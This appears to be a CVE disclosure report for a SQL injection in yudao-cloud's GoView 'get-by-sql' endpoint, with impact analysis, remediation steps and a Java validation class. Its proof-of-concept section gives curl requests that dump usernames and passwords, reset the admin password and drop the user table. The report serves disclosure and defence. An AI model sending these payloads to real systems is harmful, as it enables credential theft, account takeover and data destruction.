# CVE Report: yudao-cloud GoView SQL Injection Vulnerability #2

## Vulnerability Overview

* **Vulnerability Title**: [High] yudao-cloud GoView SQL Injection
* **Vulnerability Type**: SQL Injection (CWE-89)
* **Severity**: High (CVSS 3.1: 8.6)
* **Affected Product**: yudao-cloud
* **Affected Versions**: 2026.01 and earlier
* **Vulnerability Description**: A critical SQL injection vulnerability exists in `GoViewDataServiceImpl.java` of `yudao-cloud`. This flaw allows authenticated users with the `report:go-view-data:get-by-sql` permission to execute arbitrary SQL queries, potentially leading to unauthorized data access, data tampering, and database compromise. The `getDataySQL` method directly executes user-provided SQL statements without any parameterization or input validation.

## Impact Scope

* **Affected Components**:
  * **File**: `yudao-module-report/biz/src/main/java/io/github/ruoyi/report/service/impl/GoViewDataServiceImpl.java`
  * **Method**: `getDataySQL(String sql)`
  * **Controller**: `yudao-module-report/biz/src/main/java/io/github/ruoyi/report/controller/GoViewDataController.java`
  * **API Endpoint**: `POST /admin-api/report/go-view-data/get-by-sql`
* **Attack Vector**:
  1. **Authentication**: The attacker must possess the `report:go-view-data:get-by-sql` permission.
  2. **Injection**: The attacker sends malicious SQL via the `sql` parameter.
  3. **Execution**: The server executes the injected SQL query.
  4. **Impact**: The attacker can extract, modify, or delete database data.
* **Potential Impact**:
  1. **Data Leakage**: Extraction of sensitive data (user credentials, financial information, etc.).
  2. **Data Tampering**: Modification or deletion of database records.
  3. **Database Compromise**: Execution of arbitrary SQL commands.
  4. **Denial of Service**: Dropping tables or corrupting data.
  5. **Lateral Movement**: Potential access to other systems via database links.

## Remediation Measures

1. **Use Parameterized Queries**: Replace direct execution with prepared statements.
2. **Whitelist-Based Validation**: Validate that the SQL conforms to allowed whitelist patterns.
3. **Remove the Endpoint**: If the feature is unnecessary, remove the `get-by-sql` endpoint entirely.
4. **Additional Security Measures**: Implement input validation and sanitization, use prepared statements, enforce the least-privilege principle, enable database query logging and monitoring, implement rate limiting, and restrict SQL query length and complexity.

## Proof-of-Concept (PoC) Code

**Step 1: Normal Usage (Legitimate Query)**

```bash
curl -X POST "https://target.com/admin-api/report/go-view-data/get-by-sql" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer " \
  -d '{"sql": "SELECT * FROM user LIMIT 10"}'
```

**Step 2: SQL Injection (Unauthorized Data Access)**

```bash
# Extract user credentials
curl -X POST "https://target.com/admin-api/report/go-view-data/get-by-sql" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer " \
  -d '{"sql": "SELECT username, password FROM user"}'
```

**Step 3: SQL Injection (Data Tampering)**

```bash
# Change user password
curl -X POST "https://target.com/admin-api/report/go-view-data/get-by-sql" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer " \
  -d '{"sql": "UPDATE user SET password = \"hacked\" WHERE username = \"admin\""}'
```

**Step 4: SQL Injection (Denial of Service)**

```bash
# Drop table
curl -X POST "https://target.com/admin-api/report/go-view-data/get-by-sql" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer " \
  -d '{"sql": "DROP TABLE user"}'
```
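The remediation section above lists whitelist validation, least privilege and limits on query length and complexity but shows no code. The following is an added example, not yudao-cloud's own code: a hypothetical `SafeGoViewQuery` class that a hardened `get-by-sql` service method could delegate to instead of executing the raw string. It assumes a caller-supplied allow-list of table names and a JDBC `Connection` opened with a SELECT-only database account; the regex gate is coarse and rejects the four PoC payloads above, but the account's grants remain the real control.

```java
import java.sql.*;
import java.util.*;
import java.util.regex.*;

/** Hypothetical hardened replacement for the get-by-sql service method; added example, not yudao-cloud code. */
public final class SafeGoViewQuery {
    private static final int MAX_SQL_LENGTH = 2000, MAX_ROWS = 1000, TIMEOUT_SECONDS = 5;
    // Required shape: exactly one SELECT statement, no ';' separator anywhere.
    private static final Pattern SELECT_ONLY =
            Pattern.compile("^\\s*SELECT\\s[^;]*$", Pattern.CASE_INSENSITIVE | Pattern.DOTALL);
    // Comment markers and write/admin keywords that a dashboard query never needs.
    private static final Pattern FORBIDDEN = Pattern.compile(
            "--|/\\*|#|\\b(INSERT|UPDATE|DELETE|DROP|ALTER|CREATE|TRUNCATE|GRANT|REVOKE|INTO"
          + "|LOAD_FILE|SLEEP|BENCHMARK|INFORMATION_SCHEMA)\\b", Pattern.CASE_INSENSITIVE);
    // Every name after FROM/JOIN must be on the caller's table allow-list (hypothetical set).
    private static final Pattern TABLE_REF =
            Pattern.compile("\\b(?:FROM|JOIN)\\s+`?([A-Za-z0-9_.]+)`?", Pattern.CASE_INSENSITIVE);

    public static void validate(String sql, Set<String> allowedTables) {
        if (sql == null || sql.length() > MAX_SQL_LENGTH) throw new IllegalArgumentException("SQL missing or too long");
        if (!SELECT_ONLY.matcher(sql).matches() || FORBIDDEN.matcher(sql).find()) {
            throw new IllegalArgumentException("only a single read-only SELECT is allowed");
        }
        Matcher m = TABLE_REF.matcher(sql);
        while (m.find()) {
            if (!allowedTables.contains(m.group(1).toLowerCase())) {
                throw new IllegalArgumentException("table not allowed: " + m.group(1));
            }
        }
    }

    /** Executes a validated query with row and time caps; pair with a SELECT-only DB account. */
    public static List<Map<String, Object>> run(Connection conn, String sql, Set<String> allowed)
            throws SQLException {
        validate(sql, allowed);
        conn.setReadOnly(true); // driver hint only; least-privilege grants are the real control
        List<Map<String, Object>> rows = new ArrayList<>();
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setQueryTimeout(TIMEOUT_SECONDS); // bounds slow or deliberately expensive queries
            ps.setMaxRows(MAX_ROWS);             // bounds bulk extraction and memory use
            try (ResultSet rs = ps.executeQuery()) {
                ResultSetMetaData md = rs.getMetaData();
                while (rs.next()) {
                    Map<String, Object> row = new LinkedHashMap<>();
                    for (int i = 1; i <= md.getColumnCount(); i++) row.put(md.getColumnLabel(i), rs.getObject(i));
                    rows.add(row);
                }
            }
        }
        return rows;
    }
}
```

With an allow-list that omits `user`, `validate` rejects all four PoC bodies: the SELECT from `user` fails the table check, and the UPDATE and DROP statements fail the `SELECT_ONLY` shape and the `FORBIDDEN` keyword check. Keep the query log enabled so that rejected and executed statements are both attributable to the calling account.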